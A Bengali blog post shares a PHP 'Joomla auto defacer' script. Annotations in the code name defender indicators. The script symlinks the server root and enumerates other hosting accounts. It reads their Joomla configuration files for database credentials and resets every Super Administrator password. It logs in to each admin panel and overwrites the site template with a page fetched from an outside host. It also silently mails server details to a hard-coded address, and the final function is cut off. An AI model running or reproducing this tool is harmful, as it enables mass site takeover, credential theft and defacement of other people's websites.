joomla auto defacer

joomla auto defacer

নাদিম জোবায়ের

যাহারা আমাকে চিনেন সেটা ভাল না চিনলে আরও ভাল :P
joomla auto defacer

অনেক দিন আগে আমাদের তেরক ভাই একটা স্ক্রিপ্ট বানাইছিল :) joomla auto defacer দিয়া দিলাম সবার জন্য ।


<?
//joomla auto defacer
//coded by Force Ex

// Setup phase: hides PHP errors from the page, removes the execution time limit,
// starts a session (errors suppressed) and prints the tool's banner.
ini_set("display_errors", "0");
set_time_limit(0);
@session_start();
echo "

AUTOMATIC JOOMLA DEFACER

";
echo "

CODED BY : ECF

";
echo "

ECF

";
echo "

http://blog.ecf.me

";
// Beacon to a hard-coded mailbox: the message body carries the server IP, the
// host name and the directory this file sits in; the subject is the server IP.
// Defender note: a mail() call from a web directory to an external address with
// the server's own IP as subject is visible in MTA logs and is a useful
// detection point for this script.
$body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
mail('nadimzobaer@gmail.com',$_SERVER['SERVER_ADDR'],$body);

// URL of the directory this script is served from; later steps fetch files
// back through the web server using this prefix.
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);

// Creates a world-writable directory "ecf", drops an .htaccess into it and
// symlinks the filesystem root to ecf/root. The .htaccess asks for "Options all"
// and maps .php and .html to text/plain, apparently so that files reached through
// the symlink are returned as text instead of being executed.
// Defender note (indicators): a directory named "ecf" under a web root holding
// a symlink "root" -> "/" and an .htaccess containing "AddType text/plain .php".
// Defender note (mitigation): this depends on the web server following symlinks
// to files owned by other users and on .htaccess being allowed to override
// Options; Apache's SymLinksIfOwnerMatch and an AllowOverride setting that does
// not permit Options are the usual controls - verify against the host's config.
@mkdir('ecf',0777);
$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$fp = @fopen ('ecf/.htaccess','w');
fwrite($fp, $wr);
@symlink('/','ecf/root');
// Enumeration step 1: requests the web server's listing of /var/named (reached
// through the ecf/root symlink) and turns every listed entry into one line of
// sites.txt with the ".db" suffix removed.
// Presumably these are DNS zone files named <domain>.db, so the result is the
// list of domains hosted on the machine - inferred from the path and suffix.
// Defender note: a GET for <dir>/ecf/root/var/named/ in the access log, and a
// sites.txt appearing next to the script, are indicators; /var/named should not
// be readable by the web server user.
$text=file_get_contents($base_url.'/ecf/root/var/named/');
$ar = explode('

  • <a href="', $text);
    // Starts at index 2, i.e. skips the text before the first marker and the
    // first listed entry.
    for($vi=2;$vi < count($ar);$vi++)
    {
    // Keeps the text up to the first space, then drops its last two characters.
    $var1 = strtok($ar[$vi], " ");
    $var1 = substr($var1,0,-2);
    $old=('.db');
    $new=('');
    $sites = str_replace($old , $new , $var1);
    // Appends one name per line; the file is reopened on every iteration.
    $filename = 'sites.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $sites."\n");
    fclose($fp);
    }

    // Enumeration step 2: for every name in sites.txt, runs "ls -la" on the
    // matching entry under /etc/valiases through the shell and appends the last
    // line of output to lsla.txt. The owner column of that listing is what the
    // next step reads as the hosting account name.
    // Defender note: the name read from the file is concatenated into the shell
    // command without escaping. PHP spawning "ls -la /etc/valiases/..." is a
    // process-level indicator; disabling exec() for web PHP (disable_functions)
    // and denying the web user access to /etc/valiases both stop this step.
    $domainusers=file('sites.txt');
    foreach ($domainusers as $domainuser) {
    $textexec=("ls -la /etc/valiases/".$domainuser);
    $exec=exec($textexec);
    $filename = 'lsla.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $exec."\n");
    fclose($fp);
    }

    // Builds "user:domain " pairs from the saved ls output and appends them to
    // bhung.txt, separated by single spaces.
    $lsla=file('lsla.txt');
    foreach ($lsla as $finaldom) {
    // Account name: the text between the fixed permission string and " mail"
    // (only lines with exactly this mode/link-count prefix yield a name).
    // entre2v2() is declared near the end of this file.
    $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
    // Domain: whatever follows "/etc/valiases/" on the line (14 characters are
    // skipped: the 13-character path plus the slash).
    $site=substr(strstr($finaldom, '/etc/valiases'),14);

    $filename = 'bhung.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $user.":". $site." ");
    fclose($fp);

    }

    // Filters the pairs: entries shorter than 6 characters are written to
    // faltu.txt (discarded below), everything else goes to gold.txt, one per line.
    $f=file_get_contents('bhung.txt');
    $finals=explode(" ",$f);
    foreach ($finals as $final){
    // The threshold is held as the string '6' and compared loosely with the
    // integer length.
    $strlen=('6');
    $dr=strlen ($final);
    if ($dr < $strlen) {

    $filename = 'faltu.txt';
    $fp = fopen($filename, "a");
    $write = fputs($fp, $final);
    fclose($fp);
    }
    else {
    $filename = 'gold.txt';
    $fp = fopen($filename, "a");
    $write = fputs($fp, $final."\n");
    fclose($fp);
    }

    }
    // Removes the intermediate files. gold.txt is NOT removed and stays in the
    // web directory.
    // Defender note: a leftover gold.txt holding "account:domain" lines is an
    // indicator that this enumeration ran, and lists the accounts that were
    // targeted next.
    unlink ('bhung.txt');
    unlink ('faltu.txt');
    unlink ('lsla.txt');
    unlink ('sites.txt');

    // Downloads a page from a hard-coded external host into $h; further down $h
    // is what gets saved over each site's template index.php.
    // Defender note: an outbound HTTP fetch from PHP to this host is a network
    // indicator; egress filtering on web servers (or allow_url_fopen=Off) stops
    // the content from being loaded this way.
    $h=file_get_contents('http://blog.ecf.me');
    $url=($base_url);
    // Reads the target list back over HTTP rather than from the local path.
    $a=file($base_url.'/gold.txt');
    echo ("

    ");

    // Main loop: one pass per "account:domain" line of gold.txt. For each account
    // the script reads that account's Joomla configuration.php through the
    // ecf/root symlink, reuses the database credentials it finds, overwrites the
    // administrator login in the database, signs in to the Joomla back end and
    // replaces the active template's index.php with the content held in $h.
    // Defender note: the whole chain depends on one hosting account being able to
    // read another account's configuration.php. Restrictive permissions on that
    // file together with web-server symlink ownership checks break it at the
    // first step; file-integrity monitoring on templates/*/index.php and alerts
    // on changes to administrator rows in the users table catch the later steps.
    foreach ($a as $final) {
    list($user, $site_url) = explode(":", $final);
    // Drops the last character of the domain (the line ending kept by file()).
    $site_urlto = substr($site_url, 0, -1);
    // Path of the victim account's Joomla configuration, fetched over HTTP via
    // the symlinked root so the web server returns the file's source text.
    $url2=($url."/ecf/root/home/".$user."/public_html/configuration.php");
    $configs=file_get_contents($url2);
    // Replaces every "$" with "ecf" so the settings can be located with plain
    // string markers ("ecfuser = '" and so on).
    $old=('$');
    $new=('ecf');
    $configfile = str_replace($old , $new , $configs);
    $username=entre2v2($configfile, "ecfuser = '","';");
    $password=entre2v2($configfile, "ecfpassword = '","';");
    $dbname=entre2v2($configfile, "ecfdb = '","';");
    $dbprefix=entre2v2($configfile, "ecfdbprefix = '","';");

    // Continues only when a table prefix longer than two characters was found;
    // this doubles as the check that a configuration file was actually read.
    $strlendbprefix= strlen ($dbprefix);
    if ($strlendbprefix > 2) {
    // Connects to the local MySQL server with the victim site's own credentials.
    // Uses the legacy mysql_* extension (removed in PHP 7.0).
    $link=mysql_connect("localhost",$username,$password) ;

    mysql_select_db($dbname,$link) ;

    // Sets username 'admin' and a fixed password value on every row whose
    // usertype is 'Super Administrator'. The value has the form "<hex>:<salt>",
    // which looks like Joomla's legacy salted hash format - confirm.
    // Defender note: the fixed value below is a reliable indicator; searching the
    // users table of hosted Joomla sites for it identifies affected sites.
    $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J' where usertype='Super Administrator'");

    // Reads the password back to confirm that the update took effect.
    $reqpass=('44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J');
    $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='admin'");
    $showpass=mysql_fetch_array ($checkpass);
    if ($showpass[0]== $reqpass) {

    // Records the domain in passchanged.txt.
    // Defender note: this file lists every site whose administrator credentials
    // were replaced, including sites where the later template write failed.
    $filename = 'passchanged.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $site_url."\n");
    fclose($fp);
    // Probes for a "<prefix>extensions" table. A successful query selects the
    // first branch below (template_styles/extensions tables); a failed one
    // selects the second branch (templates_menu table). Presumably this tells a
    // newer Joomla schema from an older one - inferred from the table names.
    $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");

    // Value used as the cURL cookie file for this site. randomt() is declared at
    // the end of the file and is cut off in this copy of the script.
    $co=randomt();

    if ( $req )
    {

    // Name of the template marked as the front-end default.
    $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
    $data = mysql_fetch_array($req);
    $template_name=$data["template"];

    // Extension id of that template; the editor URL below is built from it.
    $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
    $data = mysql_fetch_array($req);
    $template_id=$data["extension_id"];

    $urlto=$site_urlto."/administrator/index.php";

    // Request 1: loads the administrator login page to pick up the session
    // cookie and the hidden form fields.
    // NOTE(review): $useragent is not assigned anywhere in the visible code, so
    // these requests probably carry no custom User-Agent - confirm; this may
    // help when correlating web access logs.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);

    $buffer = curl_exec($ch);

    // "return" field value and the name of the 4th hidden field with value="1"
    // (used below as the form token).
    $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
    $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

    // Request 2: submits the login form as 'admin' with passwd=1.
    // Defender note: an administrator login POST arriving from the server's own
    // address right after a users-table change is a strong signal in the logs.
    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    // Looks for "com_config" in the response, but both branches are empty, so
    // the outcome of the login is not acted upon.
    $pos = strpos($buffer,"com_config");
    if($pos === false) {

    }
    else {
    }
    // Request 3: opens the template source editor for the template's index.php.
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    // Name of the 2nd hidden field with value="1" on the editor page, used as
    // the token for the save request. Both branches below are empty.
    $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
    if($hidden2) {
    }
    else {

    }
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";

    // Request 4: saves the content of $h as the template's index.php.
    // Defender note: a POST with task=source.save from the server's own address,
    // and a modified templates/<name>/index.php, are the artefacts of this step.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");

    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    // Success test on the response body. The search string is only whitespace in
    // this copy of the script; it appears to have lost its original markup.
    $pos = strpos($buffer,'

    ');
    if($pos === false) {
    echo "
    Domain User Website Name CMS Status
    $user $site_url Joomla Failed

    ";
    }
    else {
    // Logs the URL of the overwritten template file to deftemp.txt.
    // Defender note: deftemp.txt is the list of sites whose template was changed.
    $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
    $filename = 'deftemp.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $deftempurl."\n");
    fclose($fp);

    echo "

    $user $site_url Joomla Defaced

    ";

    }

    }

    else
    {

    // Second branch (no "<prefix>extensions" table): same four requests with
    // different table, field and task names. The template is looked up in
    // templates_menu and addressed by name instead of by extension id.
    $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
    $data = mysql_fetch_array($req);
    $template_name=$data["template"];

    // Request 1: administrator login page.
    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    // Name of the 3rd hidden field with value="1", used as the form token.
    $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

    // Request 2: login as 'admin' with passwd=1 (no "return" field here).
    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    // As in the first branch, the login result is checked but not used.
    $pos = strpos($buffer,"com_config");

    if($pos === false) {

    }
    else {
    }
    // Request 3: opens the template source editor (task=edit_source).
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    // Name of the 6th hidden field with value="1", used as the save token.
    $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);

    if($hidden2) {

    }
    else {

    }

    // Request 4: saves $h as the template source (task=save_source).
    // Defender note: same artefacts as the first branch - a save_source POST from
    // the server's own address and a changed templates/<name>/index.php.
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    // Success test; the search string is whitespace-only in this copy.
    $pos = strpos($buffer,'

    ');
    if($pos === false) {
    echo "
    $user $site_url Joomla Failed

    ";
    }
    else {
    // Logs the URL of the overwritten template file to deftemp.txt.
    $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
    $filename = 'deftemp.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $deftempurl."\n");
    fclose($fp);

    echo "

    $user $site_url Joomla Defaced

    ";

    }

    }

    // End of the per-site work that runs after a confirmed password change.

    }
    else {
    // Password read-back did not match: the site is skipped silently.
    }
    }
    else {
    // No usable table prefix was extracted: the account is skipped silently.
    }
    }

    // Summary: loads passchanged.txt and counts its lines ($countpasschanged is
    // not used again in the visible code), then prints two labels that point to
    // the result lists. The link markup around the labels appears to have been
    // lost in this copy of the script.
    // Defender note: passchanged.txt and deftemp.txt stay in the script's
    // directory after a run and together give the scope of affected sites for
    // incident response.
    $cntpasschanged=file('passchanged.txt');
    $countpasschanged= count ($cntpasschanged);

    echo("
    ");
    $defacedurl=('View List of Defaced Site
    ');
    $passchangedurl=('View List of Password Changed site
    ');
    echo "

    $defacedurl $passchangedurl

    ";

    /**
     * Returns the trimmed text found between two marker strings.
     *
     * The text is split on the start marker, piece number $i is taken (1 means
     * the text following the first occurrence of the start marker), and that
     * piece is cut at the first occurrence of the end marker.
     *
     * There is no check that piece $i exists: when the start marker occurs fewer
     * than $i times, $ar0[$i] is read from an undefined index.
     *
     * @param string $text              Text to search.
     * @param string $marqueurDebutLien Start marker.
     * @param string $marqueurFinLien   End marker.
     * @param int    $i                 Which occurrence of the start marker to use (default 1).
     * @return string Trimmed text between the two markers.
     */
    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    // Pieces of the text separated by the start marker.
    $ar0=explode($marqueurDebutLien, $text);
    // The chosen piece, cut at the end marker; element 0 is the wanted text.
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
    }

    function randomt() {

    $chars = "abcdefghijkmnopqrstuvwxyz023456789";
    srand((double)microtime()*1000000);
    $i = 0;
    $pass = '' ;

    while ($i

  • pastebin লিংক

    http://pastebin.com/qT4RFAyh
